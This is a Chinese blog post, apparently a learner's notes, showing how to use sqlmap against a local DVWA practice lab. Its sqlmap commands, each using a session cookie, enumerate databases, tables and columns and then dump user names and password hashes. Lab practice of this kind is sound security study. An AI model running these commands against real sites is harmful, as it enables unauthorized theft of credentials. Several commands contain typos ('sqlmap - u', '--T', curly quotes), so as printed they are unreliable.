SQLmap注入练习——dvwa

最新推荐文章于 2024-05-12 12:02:22 发布
最新推荐文章于 2024-05-12 12:02:22 发布
阅读量1.7k 收藏 7
点赞数 5
分类专栏: SQLmap注入练习——dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicesa/article/details/105519737
版权

SQLmap注入练习——dvwa

记录一下自己学习的知识点

最近自己一直在学习使用kali,今天我就用kali中的sqlmap演示一下sql注入
我就从dvwa的low级别开始演示,其实同样的操作在medium和high级别也同样能够实现注入

GET提交参数

通过表单或者F12 观察网络模块,我们可以发现dvwa的low级别是GET提交参数,当然也可以通过burpsuite截断来观察。
在这里插入图片描述

提取cookie

因为dvwa需要登录后才能提交参数,所以我们要通过cookie来跑sqlmap,直接F12提取cookie
在这里插入图片描述

爆数据库名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" --dbs

如图得到数据库名字

在这里插入图片描述

爆表名

因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --tables

如图得到dvwa中的表名
在这里插入图片描述
我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名

爆列名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users --columns

得到列名如下,我们感兴趣的是user和password
在这里插入图片描述

爆账号和密码

接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users -C user,password --dump

最终得到账号和密码,达到目的
在这里插入图片描述
以上过程就是用sqlmap自动注入的过程,自己可以多练练,至于medium和high级别的道理是一样的,最好自己去尝试一下

怪味巧克力
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
利用sqlmap注入获取网址管理员账号密码
WINDY_PACE的博客
04-21 6508
sqlmap 靶场的攻击注入利用。
DVWA通过攻略之SQL注入_dvwa sql注入
最新发布
2401_84968371的博客
05-12 1139
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
欢迎来到训练场,SQL注入DVWA靶机
sinat_35855737的博客
05-11 994
手把手带你飞,在DVWA靶机上练习sql注入
DVWA——Sqlmap练习
未完成的歌~的博客
09-28 360
当使用 Sqlmap 对一个注入点是进行了测试时,可以使用 -v x 参数指定回显信息的复杂度,x属于[0~6]: 共有 7 个等级,默认为 1: 0:只显示python错误以及严重的信息。 1:同时显示基本信息和警告信息。(默认) 2:同时显示debug信息。 3:同时显示注入的payload。 4:同时显示HTTP请求。 5:同时显示HTTP响应头。 6:同时显示HTTP响应页面。 如果想看到 Sqlmap 发送的测试 payload 最好的等级就是3,例: python sqlmap.py -v
sqlmap注入漏洞测试
02-22
SQLMap 注入漏洞测试 在 Web 应用程序中, SQL 注入是一种常见的安全漏洞,它可以让攻击者访问和控制数据库中的敏感数据。SQLMap 是一款自动化SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的...
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
SQLmap注入工具
09-20
sqlmap是一个自动化SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
SqlMap注入软件
03-29
SqlMap是一款强大的自动化工具,专为安全专家设计,用于检测和利用SQL注入漏洞。这款开源软件在渗透测试领域中有着广泛的应用,被誉为检测和利用SQL注入的“神器”。它的核心功能在于,通过智能分析和利用潜在的SQL...
sqlmap注入
10-26
SQLMap是一种广泛使用的开源自动化工具,专门用于检测和利用SQL注入漏洞。它的主要目标是帮助安全研究人员和渗透测试者在Web应用程序中发现和利用数据库漏洞。以下是对SQLMap注入相关知识点的详细介绍: **1. SQL...
第九节 Sqlmap注入位置介绍-01
09-15
Sqlmap 注入位置介绍 Sqlmap 是一个开源的 penetration testing工具,旨在检测和利用 SQL 注入漏洞。下面是关于Sqlmap 注入位置的详细介绍: 一、Sqlmap 注入介绍 Sqlmap 注入是指通过将恶意的 SQL 命令插入到 ...
sqlmap注入测试工具
07-11
SQL注入注入神器
exe版sqlmap注入工具
07-26
SQLMap是一款著名的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞,以获取数据库中的敏感信息,甚至完全控制系统。在给定的“exe版sqlmap注入工具”中,我们可以理解为这个版本是专为不支持Python环境的...
sqlmap使用的简单介绍(基于dvwa讲解)
weixin_41657031的博客
07-14 1012
前言:写这篇文章主要是给自己做个笔记,也方便刚入门的新手快速上手。至于详细原理和基础,各位还得自己动手搜索其他文章或者看书学习。 本教程基于dvwa来测试,首先我们直接以SQL Injection (Blind)的medium level为例: 1.首先,我们先准备好burpsuite进行抓包,然后在输入框里输入一个数字: 点击提交,在burpsuite里抓到包 2.我们把里面的代码全部复制下...
sqlmap自动扫描注入点_kali之SqlMap的使用
weixin_39663605的博客
11-22 1647
sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语...
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 5842
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
使用SQLmap检测SQL注入DVWA实战教程
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmapDVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值